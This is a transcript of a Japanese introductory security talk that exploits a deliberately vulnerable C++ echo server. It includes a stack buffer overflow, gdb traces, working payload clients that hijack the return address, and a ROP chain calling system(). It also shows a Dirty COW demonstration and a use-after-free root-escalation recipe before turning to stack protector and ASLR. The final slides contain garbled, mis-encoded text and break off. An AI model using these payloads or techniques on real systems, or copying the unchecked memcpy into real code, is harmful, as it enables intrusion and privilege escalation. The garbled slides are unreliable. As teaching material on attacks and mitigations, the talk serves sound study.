Introduction to Security (セキュリティ入門)

Fadis
April 12, 2018

Transcript

  1. Introduction to Security (セキュリティ入門) NAOMASA MATSUBAYASHI

  2. The goal of security

  3. (Diagram: important data, a server, a benign user, a malicious user.) The simplest and most reliable way to protect important data is to accept no access at all.

  4. (Same diagram.) But in order to provide a service, the server has to accept requests from users.

  5. (Same diagram.) It has to accept the users who use it in the intended way while refusing the users who use it in ways that were not intended.

  6. Good security means being able to tell intended use from unintended use more accurately.

  7. So what is "unintended use"?

  8. An echo server with a bug (https://wandbox.org/permlink/eucMJp4DkeLhnGlq):

      #include <memory>
      #include <cstring>           // std::memcpy (the include was missing from the slide)
      #include <boost/asio.hpp>
      #include <boost/bind.hpp>
      namespace asio = boost::asio;
      using boost::asio::ip::tcp;
      using sock_p = std::shared_ptr< tcp::socket >;
      using buf_p = std::shared_ptr< asio::streambuf >;
      using error_type = boost::system::error_code;

      struct session : public std::enable_shared_from_this< session > {
        session( asio::io_service &io ) : sock( io ) {}
        // read one line (up to '\n') from the client, then call check_on_read
        void read() {
          boost::asio::async_read_until( sock, buf, '\n',
            boost::bind( &session::check_on_read, shared_from_this(),
              asio::placeholders::bytes_transferred, asio::placeholders::error ) );
        }
        // echo len bytes back to the client, then call check_on_write
        void write( const char *data, size_t len ) {
          boost::asio::async_write( sock, boost::asio::buffer( data, len ),
            boost::bind( &session::check_on_write, shared_from_this(), asio::placeholders::error ) );
        }
        tcp::socket &get_socket() { return sock; }
      private:
        void check_on_read( size_t len, const error_type& e ) {
          if( e && e != boost::asio::error::eof ) return;
          on_read( len );
        }
        void on_read( size_t len ) {
          char received[ 32 ];     // fixed-size buffer on the stack
          // len is however many bytes the client sent up to the newline; it is never compared with 32
          std::memcpy( received, asio::buffer_cast<const char*>( buf.data() ), len );
          buf.consume( len );
          received[ len ] = '\0';
          write( received, len );  // received is a local array; kept as in the talk, the gdb session below depends on this layout
        }
        void check_on_write( const error_type& e ) {
          if( e && e != boost::asio::error::eof ) return;
          on_write();
        }
        void on_write() { read(); }
        tcp::socket sock;
        asio::streambuf buf;
      };

      struct server {
        server( asio::io_service &io_ ) : io( io_ ), acc( io, tcp::endpoint( tcp::v4(), 20000 ) ) { accept(); }
        void accept() {
          std::shared_ptr< session > s( new session( io ) );
          acc.async_accept( s->get_socket(), boost::bind( &server::on_accept, this, s, asio::placeholders::error ) );
        }
      private:
        void on_accept( const std::shared_ptr< session > &s, const error_type& e ) {
          if( !e ) s->read();
          accept();
        }
        asio::io_service &io;
        boost::asio::ip::tcp::acceptor acc;
      };

      int main() {
        asio::io_service io;
        server s( io );
        io.run();
      }

  10. The problem is in on_read():

      void on_read( size_t len ) {
        char received[ 32 ];
        std::memcpy( received, asio::buffer_cast<const char*>( buf.data() ), len );
        buf.consume( len );
        received[ len ] = '\0';
        write( received, len );
      }

    received has a fixed length. Data received over the network is not guaranteed to be of a size that fits in a fixed-length array, so a buffer overrun can be triggered from a remote host.
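As an added example (not code from the talk or its tiny_server), the on_read() step above isolated from Boost.Asio so it can be compiled and run on its own, next to two corrected versions; LineBuffer, RECEIVED_SIZE, line_fits, on_read_checked, on_read_dynamic and MAX_LINE are names chosen here.

```cpp
#include <cstddef>
#include <cstring>
#include <string>

// Added example, not code from the talk. It isolates the on_read() step of
// the slides' echo server without Boost.Asio. LineBuffer, RECEIVED_SIZE,
// line_fits, on_read_checked, on_read_dynamic and MAX_LINE are this
// example's own names.

constexpr std::size_t RECEIVED_SIZE = 32;   // the slides' char received[32]

// Stand-in for asio::streambuf: the bytes async_read_until has accumulated.
struct LineBuffer {
    std::string data;
    void consume(std::size_t n) { data.erase(0, n); }
};

// `len` plays the role of bytes_transferred: the bytes up to and including
// the '\n' delimiter. The slides' code does memcpy(received, ..., len) and
// then received[len] = '\0', so the write stays inside the array only if
// len + 1 <= sizeof(received), i.e. len <= 31. A 32-byte line already
// overruns by one byte through the terminator.
bool line_fits(std::size_t len) {
    return len < RECEIVED_SIZE;
}

// Hardened on_read(): the check runs before a single byte is copied.
// Returns false (and drops the pending input) for a line that cannot fit;
// the caller should then close the connection instead of echoing.
bool on_read_checked(LineBuffer &buf, std::size_t len, std::string &echoed) {
    if (len > buf.data.size() || !line_fits(len)) {
        buf.consume(buf.data.size());
        echoed.clear();
        return false;
    }
    char received[RECEIVED_SIZE];
    std::memcpy(received, buf.data.data(), len);
    buf.consume(len);
    received[len] = '\0';          // now guaranteed to be inside the array
    echoed.assign(received, len);
    return true;
}

// Alternative that removes the fixed-size array altogether: the echo payload
// lives in a std::string sized by the input, so there is nothing to overrun.
// A cap is still enforced so a client cannot make the server buffer
// arbitrarily long lines.
constexpr std::size_t MAX_LINE = 4096;

bool on_read_dynamic(LineBuffer &buf, std::size_t len, std::string &echoed) {
    if (len > buf.data.size() || len > MAX_LINE) {
        buf.consume(buf.data.size());
        echoed.clear();
        return false;
    }
    echoed = buf.data.substr(0, len);
    buf.consume(len);
    return true;
}

int main() {
    std::string out;
    LineBuffer ok{"Hello, World!\r\n"};                       // the 15-byte line from the telnet demo
    bool a = on_read_checked(ok, ok.data.size(), out);        // true: echoed as before
    LineBuffer crash{std::string(67, 'A') + "\n"};            // len = 68, the size seen in the gdb session
    bool b = on_read_checked(crash, crash.data.size(), out);  // false: refused, nothing written past received
    return (a && !b) ? 0 : 1;
}
```

The check also covers the off-by-one hidden in received[len] = '\0': a 32-byte line is rejected, not only lines of 33 bytes or more.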
  11. Client and server when the line fits:

      (server)  $ ./tiny_server
      (client)  $ telnet localhost 20000
                Trying ::1...
                Trying 127.0.0.1...
                Connected to localhost.
                Escape character is '^]'.
                Hello, World!
                Hello, World!

    Data sent: … bytes; data received: … bytes. As long as the line fits in received, the server behaves as intended.

  12. Client and server when it does not:

      (client)  $ telnet localhost 20000
                Trying ::1...
                Trying 127.0.0.1...
                Connected to localhost.
                Escape character is '^]'.
                Hello, World! I would like to crash this server. Blah blah blah...
                Hello, World! I would like to crash this server. Blah blah blah...
                Connection closed by foreign host.
      (server)  $ ./tiny_server
                Segmentation fault

    The server died.

  13. When an attacker can make a service unusable, we say that a Denial of Service attack, DoS attack for short, is possible.

  14. By the way, why did that server die?

  15. Let us look at the moment the server dies, in a debugger. We already know where the problem is, so we set breakpoints before and after the memcpy that causes the buffer overrun:

      $ gdb -q tiny_server
      Reading symbols from tiny_server...done.
      (gdb) disas session::on_read
      Dump of assembler code for function session::on_read(unsigned long):
      …
         0x000000000040a6c3 <+69>:    callq  0x403340 <memcpy@plt>
         0x000000000040a6c8 <+74>:    mov    -0x38(%rbp),%rax
      …
      (gdb) b *0x40a6c3
      Breakpoint 1 at 0x40a6c3: file tiny_server.cpp, line 38.
      (gdb) b *0x40a6c8
      Breakpoint 2 at 0x40a6c8: file tiny_server.cpp, line 39.
      (gdb) run
      Starting program: /home/fadis/tiny_server
      [Thread debugging using libthread_db enabled]
      Using host libthread_db library "/lib64/libthread_db.so.1".

      Breakpoint 1, 0x000000000040a6c3 in session::on_read (this=0x632ef0, len=68) at tiny_server.cpp:38
      38          std::memcpy( received, asio::buffer_cast<const char*>( buf.data() ), len );
      (gdb) p &received
      $1 = (char (*)[32]) 0x7fffffffd2c0

  16. The state of 256 bytes of memory starting at received, just before the message from the client is written into received (the 32 bytes reserved for received begin at 0x7fffffffd2c0):

      (gdb) x/40wx 0x7fffffffd2c0
      0x7fffffffd2c0: 0xffffd380  0x00007fff  0x0040fe53  0x00000000
      0x7fffffffd2d0: 0x006331b0  0x00000000  0x00000044  0x00000000
      0x7fffffffd2e0: 0x006331b0  0x00000000  0x00000044  0x00000000
      0x7fffffffd2f0: 0xffffd340  0x00007fff  0x0040a674  0x00000000
      0x7fffffffd300: 0x00000043  0x00000000  0xffffd5d0  0x00007fff
      0x7fffffffd310: 0x00000044  0x00000000  0x00632ef0  0x00000000
      0x7fffffffd320: 0xffffd340  0x00007fff  0x00412898  0x00000000
      0x7fffffffd330: 0xffffd5c0  0x00007fff  0x00000044  0x00000000
      0x7fffffffd340: 0xffffd380  0x00007fff  0x00411cdc  0x00000000
      0x7fffffffd350: 0xffffd7b0  0x00007fff  0xffffd5d0  0x00007fff

  17. The same memory just after the message from the client has been written into received:

      (gdb) c
      Continuing.

      Breakpoint 2, session::on_read (this=0x632ef0, len=68) at tiny_server.cpp:39
      39          buf.consume( len );
      (gdb) x/40wx 0x7fffffffd2c0
      0x7fffffffd2c0: 0x6c6c6548  0x57202c6f  0x646c726f  0x20492021
      0x7fffffffd2d0: 0x6c756f77  0x696c2064  0x7420656b  0x7263206f
      0x7fffffffd2e0: 0x20687361  0x73696874  0x72657320  0x2e726576
      0x7fffffffd2f0: 0x616c4220  0x6c622068  0x62206861  0x2e68616c
      0x7fffffffd300: 0x0a0d2e2e  0x00000000  0xffffd5d0  0x00007fff
      0x7fffffffd310: 0x00000044  0x00000000  0x00632ef0  0x00000000
      0x7fffffffd320: 0xffffd340  0x00007fff  0x00412898  0x00000000
      0x7fffffffd330: 0xffffd5c0  0x00007fff  0x00000044  0x00000000
      0x7fffffffd340: 0xffffd380  0x00007fff  0x00411cdc  0x00000000
      0x7fffffffd350: 0xffffd7b0  0x00007fff  0xffffd5d0  0x00007fff
      (gdb) i r rsp rbp
      rsp            0x7fffffffd2b0   0x7fffffffd2b0
      rbp            0x7fffffffd2f0   0x7fffffffd2f0
      (gdb) c
      Continuing.

      Program received signal SIGSEGV, Segmentation fault.
      0x000000000040a706 in session::on_read (this=0x632ef0, len=68) at tiny_server.cpp:42
      42        }

  18. A newline character is visible at 0x7fffffffd300 (the word 0x0a0d2e2e), which tells us that the write continued past the end of the array, which only covers the 32 bytes from 0x7fffffffd2c0, all the way up to here.

  19. Where did it die? When execution continues, it dies at the point where on_read returns. Looking at the backtrace, the address of the caller that on_read tried to return to is wrong:

      (gdb) backtrace
      #0  0x000000000040a706 in session::on_read (this=0x632ef0, len=68) at tiny_server.cpp:42
      #1  0x2e68616c62206861 in ?? ()
      #2  0x000000000a0d2e2e in ?? ()
      #3  0x00007fffffffd5d0 in ?? ()
      #4  0x0000000000000044 in ?? ()
      #5  0x0000000000632ef0 in ?? ()
      #6  0x00007fffffffd340 in ?? ()
      #7  0x0000000000412898 in boost::get_pointer<session> (p=<error reading variable: Cannot access memory at address 0x6c622068616c4218>) at /usr/include/boost/get_pointer.hpp:69
      Backtrace stopped: Cannot access memory at address 0x6c622068616c4228
      (gdb) disas
      …
      => 0x000000000040a706 <+136>:   retq
      End of assembler dump.

  20. That address (0x2e68616c62206861, frame #1) is part of the message that was just written.
  21. Structure of the CPU (registers: rax rbx rcx rdx rsi rdi rbp rsp r8 r9 r10 r11 r12 r13 r14 r15). Today's Intel processors have 16 boxes (registers) in which the values used for computation are kept. When 16 are not enough, values that are not needed right now are moved out to memory to free a register.

  22. The stack. Values evacuated from registers are piled up one on top of another (the value moved out of rdi, the value moved out of rax, the value moved out of rbp, the value moved out of rdi, …); when an evacuated value is needed again it is taken back from the top. A memory region used in this way is called a stack.

  23. The stack and local variables:

      int f( int x, int y ) {
        int i;
        i = x * y;
        return i;
      }

    A local variable like i is placed on the stack, among the other variables. When a local variable is created its value is pushed onto the stack; when its scope ends, the value on the stack is discarded.

  24. A function call is compiled to a callq instruction, and a return to a retq instruction:

      int f( int i, int j ) { return i + j; }
      int g() { return f( 2, 3 ); }

      00000000004004b6 <f>:
        4004b6:  55                    push   %rbp
        4004b7:  48 89 e5              mov    %rsp,%rbp
        4004ba:  89 7d fc              mov    %edi,-0x4(%rbp)
        4004bd:  89 75 f8              mov    %esi,-0x8(%rbp)
        4004c0:  8b 55 fc              mov    -0x4(%rbp),%edx
        4004c3:  8b 45 f8              mov    -0x8(%rbp),%eax
        4004c6:  01 d0                 add    %edx,%eax
        4004c8:  5d                    pop    %rbp
        4004c9:  c3                    retq
      00000000004004ca <g>:
        4004ca:  55                    push   %rbp
        4004cb:  48 89 e5              mov    %rsp,%rbp
        4004ce:  be 03 00 00 00        mov    $0x3,%esi
        4004d3:  bf 02 00 00 00        mov    $0x2,%edi
        4004d8:  e8 d9 ff ff ff        callq  4004b6 <f>
        4004dd:  5d                    pop    %rbp
        4004de:  c3                    retq

    callq pushes the address of the instruction following itself onto the stack and jumps to the address given as its operand. retq jumps to the address at the top of the stack and discards that value. This combination is what implements "when the function finishes, go back to where it was called from".

  25. (Stack diagram: f's variables; where to return when g finishes; g's variables; where to return when h finishes; h's variables.) This is the stack while f has called g and, inside g, h has been called. For the function currently running, the positions of the top and the bottom of its stack are recorded in the CPU's %rsp and %rbp registers.

  26. (Same diagram, with f's rbp and g's rbp marked.) When a function is entered with callq, it first pushes the current %rbp onto the stack and then sets %rbp to %rsp; that is, the top of the caller's stack becomes the bottom of the stack of the function about to run. Just before retq, it sets %rbp back to the value at the top of the stack and discards that value.

  27. In the disassembly of f above: push %rbp puts rbp on the stack; mov %rsp,%rbp sets rbp to the value of rsp; the instructions in the middle are the function's actual work; pop %rbp sets rbp back to the value on the stack; retq returns to the address written on the stack.
  28. Before the buffer overrun (the first x/40wx dump in slide 16): everything from 0x7fffffffd2c0 upward is on_read's stack. At the breakpoint in on_read, the registers read

      (gdb) i r rsp rbp
      rsp            0x7fffffffd2b0   0x7fffffffd2b0
      rbp            0x7fffffffd2f0   0x7fffffffd2f0

    The 8 bytes at 0x7fffffffd2f0 (0x00007fffffffd340) are the %rbp of the function that called on_read, and the 8 bytes after them (0x000000000040a674) are the address on_read will jump to when it returns.

  29. After the buffer overrun (the second dump): rsp and rbp are unchanged, but the slot that held the return address now contains 0x2e68616c62206861, bytes of the message. The return address has been overwritten.

  30. retq was executed with the return address overwritten; the memory the address pointed to could not be accessed, so the process was stopped for an out-of-range access. The buffer overrun overwrote the return address that was lying just past the array received.

  31. What would have happened if the overwritten address had been accessible?

  32. A client that sends crafted data:

      #include <iostream>
      #include <vector>
      #include <cstdint>
      #include <boost/asio.hpp>
      int main() {
        namespace asio = boost::asio;
        using boost::asio::ip::tcp;
        asio::io_service io_service;
        tcp::socket socket(io_service);
        socket.connect( tcp::endpoint( asio::ip::address::from_string("127.0.0.1"), 20000 ) );
        std::vector< uint8_t > data {
          // 32 bytes: fill received[32]
          0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
          0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
          0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
          0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
          // the 24 bytes between the end of received and the return address
          0xb0, 0x31, 0x63, 0x00, 0x00, 0x00, 0x00, 0x00,
          0x42, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
          0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
          // return address slot: 0x00007ffff6f624e0, the address of abort
          0xe0, 0x24, 0xf6, 0xf6, 0xff, 0x7f, 0x00, 0x00,
          0x0d, 0x0a,
        };
        boost::system::error_code error;
        asio::write(socket, asio::buffer(data), error);
        return 0;   // as on the slide: the program ends here without waiting for the echo
        if( !error ) {
          asio::streambuf receive_buffer;
          asio::read_until(socket, receive_buffer, '\n', error);
          std::cout << asio::buffer_cast<const char*>(receive_buffer.data()) << std::endl;
        }
      }

  33. The data sent to the server is built so that the address of the C standard library's abort function lands in the return address position on the stack:

      (gdb) disas abort
      Dump of assembler code for function abort:
         0x00007ffff6f624e0 <+0>:     sub    $0x128,%rsp
         0x00007ffff6f624e7 <+7>:     mov    %fs:0x10,%rdx
      …

  34. Client and server:

      (client)  $ ./pktgen
      (server)  $ gdb -q ./tiny_server
                Reading symbols from ./tiny_server...done.
                (gdb) run
                Starting program: /home/fadis/tiny_server
                [Thread debugging using libthread_db enabled]
                Using host libthread_db library "/lib64/libthread_db.so.1".

                Program received signal SIGABRT, Aborted.
                0x00007ffff6f61228 in raise () from /lib64/libc.so.6
                (gdb) backtrace
                #0  0x00007ffff6f61228 in raise () from /lib64/libc.so.6
                #1  0x00007ffff6f6264a in abort () from /lib64/libc.so.6
                #2  0x0000000000000a0d in ?? ()
                #3  0x00007fffffffd5d0 in ?? ()
                #4  0x0000000000000042 in ?? ()
                #5  0x0000000000632ef0 in ?? ()
                #6  0x00007fffffffd340 in ?? ()
                #7  0x0000000000412898 in boost::get_pointer<session> (p=<error reading variable: Cannot access memory at address 0xfffffffffffffff9>) at /usr/include/boost/get_pointer.hpp:69
                Backtrace stopped: previous frame inner to this frame (corrupt stack?)

    The server stopped with SIGABRT instead of SIGSEGV.

  35. The abort function, which the server's code never calls, shows up in the backtrace as having been called.

  36. A function chosen by the attacker was executed.

  37. The attacker wants to gain control of the server, and for that wants to start a shell. The quickest way to bring up a shell is to call system("command to run");. So it is not enough to be able to call an arbitrary function: an arbitrary string must also be passed to it as an argument.

  38. On x86_64 Linux the first argument of a function is passed in the %rdi register [1]. (Register figure: rax rbx rcx rdx rsi rdi rbp rsp r8 r9 r10 r11 r12 r13 r14 r15.) After writing the command to run into memory, its address somehow has to be put into %rdi, and then the function has to be called by way of retq.

    [1] System V Application Binary Interface, AMD64 Architecture Processor Supplement, §3.5.7 Variable Argument Lists

  39. Look through the standard library and similar code for a place that does a pop followed by retq:

      (gdb) disas _ZNSi6ignoreEl
      …
         0x00007ffff788dfc5 <+309>:   pop    %r14
         0x00007ffff788dfc7 <+311>:   retq

    Write the following on the stack and retq: 0x7ffff788dfc5; the value to be placed in %r14; the address to execute next. The result is that an arbitrary value can be placed in %r14. This is Return Oriented Programming: if you can find a pop of the register you want to control followed by retq, you can call an arbitrary function with arbitrary arguments.

  40. A client that sends crafted data, which creates a file:

      #include <iostream>
      #include <vector>
      #include <cstdint>
      #include <algorithm>
      #include <iterator>
      #include <boost/asio.hpp>
      int main() {
        namespace asio = boost::asio;
        using boost::asio::ip::tcp;
        asio::io_service io_service;
        tcp::socket socket(io_service);
        socket.connect( tcp::endpoint( asio::ip::address::from_string("127.0.0.1"), 20000 ) );
        // the command to run (the shell script), padded to 16 bytes
        const std::vector< uint8_t > command{
          't', 'o', 'u', 'c', 'h', ' ', 'a', 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        };
        std::vector< uint8_t > data {
          // 32 bytes: fill received[32]
          0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
          0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
          0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
          0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
          // the 24 bytes between the end of received and the return address
          0xb0, 0x31, 0x63, 0x00, 0x00, 0x00, 0x00, 0x00,
          0xf2, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
          0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
          // address for jumping to the code that does pop rdi then retq
          0x54, 0x1f, 0x93, 0xf7, 0xff, 0x7f, 0x00, 0x00,
          // value to load into rdi
          0xa0, 0xd3, 0xff, 0xff, 0xff, 0x7f, 0x00, 0x00,
          // system()
          0x50, 0xd3, 0xf6, 0xf6, 0xff, 0x7f, 0x00, 0x00,
          // sync()
          0xc0, 0xe5, 0x00, 0xf7, 0xff, 0x7f, 0x00, 0x00,
          // exit()
          0x90, 0x3b, 0xf6, 0xf6, 0xff, 0x7f, 0x00, 0x00
        };
        // the shell script, repeated 10 times
        for( size_t i = 0u; i != 10u; ++i )
          std::copy( command.begin(), command.end(), std::back_inserter( data ) );
        data.push_back( 0x0d );
        data.push_back( 0x0a );
        boost::system::error_code error;
        asio::write(socket, asio::buffer(data), error);
        return 0;   // as on the slide: the program ends here without waiting for the echo
        if( !error ) {
          asio::streambuf receive_buffer;
          asio::read_until(socket, receive_buffer, '\n', error);
          std::cout << asio::buffer_cast<const char*>(receive_buffer.data()) << std::endl;
        }
      }

  42. Layout of data: after the 32 bytes that fill received come the address for jumping to the code that does pop rdi then retq, the value to load into rdi, then system(), sync() and exit(), and after them the command to run (the shell script).

  43. Client and server:

      (client)  $ ./pktgen
      (server)  $ gdb -q ./tiny_server
                Reading symbols from ./tiny_server...done.
                (gdb) run
                Starting program: /home/fadis/tiny_server
                [Thread debugging using libthread_db enabled]
                Using host libthread_db library "/lib64/libthread_db.so.1".
                [Inferior 1 (process 11310) exited with code 02]
                (gdb) quit
                $ ls
                a  tiny_server

    Something has been created.
  44. The attacker was able to perform arbitrary operations on the server.

  45. The shell the attacker runs has the privileges of the user who ran the attacked process. If the attacked process was not running as root, the attacker needs privilege escalation to take over the server completely. (Permission Denied)

  46. An example of a vulnerability used for privilege escalation: https://dirtycow.ninja/ (screenshot of the DIRTY COW top page)

  47. DIRTY COW (CVE-2016-5195). If MAP_PRIVATE is given at mmap time, writes to the mapping can be kept from being written through to the original file. (Diagram: address space; the file as seen from the process; the original file; reads and writes.)

  48. DIRTY COW (CVE-2016-5195). The bug: when a write is made at the same moment as the process tells the kernel "I will not use this for a while, you may drop the write-prepared copy from memory" (MADV_DONTNEED), the write goes to the original file. (Diagram: the write ends up going to the original file.)

  49. DIRTY COW (CVE-2016-5195). The bug itself is not complicated, and the fixing patch is only about … lines long: https://github.com/kcgthb/RHEL6.x-COW/blob/master/6.7/noc0w.patch (screenshot of the DIRTY COW fix patch)

  50. DIRTY COW (CVE-2016-5195):

      root # echo 'abcde' >sample.txt
      root # ls -lha sample.txt
      -rw-r--r-- 1 root root 6 Mar 18 11:21 sample.txt
      root # logout
      non_root $ cat sample.txt
      abcde
      non_root $ ./dirtyc0w sample.txt 'pwned'
      mmap 7f214599a000
      ^C
      non_root $ cat sample.txt
      pwned
      non_root $ ls -lha sample.txt
      -rw-r--r-- 1 root root 6 3月 18 11:21 sample.txt

    An ordinary user has rewritten a file that only root can write. If this is possible, one could even remove the authentication for logging in as root.

  51. CVE-2017-15265: create an ALSA Sequencer [1] port and destroy it immediately. (Diagram, user space and kernel space: thread 1 says "give me a port", the kernel says "here you go", allocates memory for the port and initialises it; meanwhile thread 2 says "I don't need the port any more" and the kernel frees the port's memory; when initialisation tries to use it, it is already gone.)

    [1] ALSA Sequencer http://www.alsa-project.org/~frank/alsa-sequencer/index.html

  52. Use After Free. (Screenshot of the place in the Linux kernel's ALSA Sequencer initialisation that reads a callback: https://elixir.bootlin.com/linux/v4.15.10/source/sound/core/seq/seq_clientmgr.c#L619. The port has already been freed, but here the callback set on the port is called.) Kernel structures contain many callback function pointers. If memory of the same size is allocated after a region is freed, the same region is obtained with high probability. Overwrite a callback with an arbitrary address and let the kernel call it.

  53. Use After Free. What to have it call with this? Of course: commit_creds( prepare_kernel_cred( NULL ) ); which translates to "make me root". Merely reaching a state where a callback is called from a freed region can make this attack possible, so privilege escalation vulnerabilities based on Use After Free are found frequently.

  54. Use After Free: CVE … CVE … CVE … CVE … CVE … CVE … CVE …

  55. The attacker has taken over the server completely.

  56. A trivial bug often ruins the security of a server.

  57. The best thing is to have no bugs, but bugs will appear anyway. We must assume that bugs will appear and take measures so that, as far as possible, they do not lead directly to a fatal attack.

  58. stack protector, one of gcc's optimisation options. The function f from before, with it and without it; something has been added:

      with stack protector:
      f:
        push   %rbp
        mov    %rsp,%rbp
        sub    $0x20,%rsp
        mov    %edi,-0x14(%rbp)
        mov    %esi,-0x18(%rbp)
        mov    %fs:0x28,%rax
        mov    %rax,-0x8(%rbp)
        xor    %eax,%eax
        mov    -0x14(%rbp),%edx
        mov    -0x18(%rbp),%eax
        add    %edx,%eax
        mov    -0x8(%rbp),%rcx
        xor    %fs:0x28,%rcx
        je     40055f <f+0x39>
        callq  400400 <__stack_chk_fail@plt>
        leaveq
        retq

      without stack protector:
      f:
        push   %rbp
        mov    %rsp,%rbp
        mov    %edi,-0x4(%rbp)
        mov    %esi,-0x8(%rbp)
        mov    -0x4(%rbp),%edx
        mov    -0x8(%rbp),%eax
        add    %edx,%eax
        pop    %rbp
        retq

  59. stack protector. At the start of f, a value read from a fixed address (%fs:0x28) is pushed onto the stack (mov %fs:0x28,%rax; mov %rax,-0x8(%rbp)). At the end, the value read again from that same address is compared with the value on the stack (xor %fs:0x28,%rcx), and if they do not match the program aborts (__stack_chk_fail).

  60. stack protector. (Stack diagram: g's variables; where to return when f finishes; g's rbp; a random value; f's variables.) To overwrite the return address with a buffer overrun, the write has to reach all the way up to it, but the random value sits in between. If that value gets overwritten, the program terminates abnormally. Arbitrary code execution by way of a buffer overrun becomes very much harder.

  61. stack protector. The stack has already been corrupted at the point of the check, so execution cannot go back to the normal processing. stack-protector turns a vulnerability that lets an attacker execute arbitrary code into a vulnerability that only lets the attacker mount a DoS attack.

  62. A case where stack protector actually helped: Blueborne (CVE-2017-1000251). An unauthenticated user who can connect to the system over Bluetooth can crash the system, or, if stack protector is not enabled, may be able to execute arbitrary code. (Screenshot of Red Hat's write-up of Blueborne: https://access.redhat.com/security/vulnerabilities/blueborne)

  63. stack protector uses a little extra stack and adds an extra memory access and comparison. -fno-stack-protector (the default): no stack protector at all. -fstack-protector (recommended): stack protector for functions that handle strings of … bytes or more. -fstack-protector-all: stack protector for every function. We want to apply it only where it is useful.

  64. stack protector detects memory corruption on the stack. If the buffer overrun happens somewhere other than the stack, for example on the heap, and a jump to an address corrupted there is possible, stack protector cannot prevent the attack.
  65. address space layout randomization $ cat /proc/self/maps 00400000-00407000 r-xp 00000000

    08:03 35724749 /bin/cat … 00608000-00629000 rw-p 00000000 00:00 0 [heap] 7f9e54cd8000-7f9e5b63d000 r--p 00000000 08:03 78637654 /usr/lib64/locale/locale-archive 7f9e5b63d000-7f9e5b7cc000 r-xp 00000000 08:03 10430373 /lib64/libc-2.23.so … 7ffeb0a50000-7ffeb0a72000 rw-p 00000000 00:00 0 [stack] 7ffeb0b87000-7ffeb0b89000 r--p 00000000 00:00 0 [vvar] 7ffeb0b89000-7ffeb0b8b000 r-xp 00000000 00:00 0 [vdso] ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [vsyscall] $ cat /proc/self/maps 00400000-00407000 r-xp 00000000 08:03 35724749 /bin/cat … 00608000-00629000 rw-p 00000000 00:00 0 [heap] 7f5e24988000-7f5e2b2ed000 r--p 00000000 08:03 78637654 /usr/lib64/locale/locale-archive 7f5e2b2ed000-7f5e2b47c000 r-xp 00000000 08:03 10430373 /lib64/libc-2.23.so … 7fffe276e000-7fffe2790000 rw-p 00000000 00:00 0 [stack] 7fffe27c2000-7fffe27c4000 r--p 00000000 00:00 0 [vvar] 7fffe27c4000-7fffe27c6000 r-xp 00000000 00:00 0 [vdso] ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [vsyscall] ϓϩηεΛىಈ͢ΔͨͼʹϝϞϦϨΠΞ΢τΛม͑Δ 1ճ໨ 2ճ໨
  66. address space layout randomization $ cat /proc/self/maps 00400000-00407000 r-xp 00000000

    08:03 35724749 /bin/cat … 00608000-00629000 rw-p 00000000 00:00 0 [heap] 7f9e54cd8000-7f9e5b63d000 r--p 00000000 08:03 78637654 /usr/lib64/locale/locale-archive 7f9e5b63d000-7f9e5b7cc000 r-xp 00000000 08:03 10430373 /lib64/libc-2.23.so … 7ffeb0a50000-7ffeb0a72000 rw-p 00000000 00:00 0 [stack] 7ffeb0b87000-7ffeb0b89000 r--p 00000000 00:00 0 [vvar] 7ffeb0b89000-7ffeb0b8b000 r-xp 00000000 00:00 0 [vdso] ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [vsyscall] $ cat /proc/self/maps 00400000-00407000 r-xp 00000000 08:03 35724749 /bin/cat … 00608000-00629000 rw-p 00000000 00:00 0 [heap] 7f5e24988000-7f5e2b2ed000 r--p 00000000 08:03 78637654 /usr/lib64/locale/locale-archive 7f5e2b2ed000-7f5e2b47c000 r-xp 00000000 08:03 10430373 /lib64/libc-2.23.so … 7fffe276e000-7fffe2790000 rw-p 00000000 00:00 0 [stack] 7fffe27c2000-7fffe27c4000 r--p 00000000 00:00 0 [vvar] 7fffe27c4000-7fffe27c6000 r-xp 00000000 00:00 0 [vdso] ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [vsyscall] ϓϩηεΛىಈ͢ΔͨͼʹϝϞϦϨΠΞ΢τΛม͑Δ 1ճ໨ 2ճ໨ ελοΫͷΞυϨε͕࣮ߦ͢ΔͨͼʹมԽ͍ͯ͠Δ 7ffeb0a50000-7ffeb0a72000 7fffe276e000-7fffe2790000 system()ʹ౉͢ҝʹॻ͖ࠐΜͩ γΣϧεΫϦϓτͷΞυϨε͕ຖճมΘΔҝ εΫϦϓτͷ࣮ߦ͕ͱͯ΋೉͘͠ͳΔ
  67. address space layout randomization $ cat /proc/self/maps 00400000-00407000 r-xp 00000000

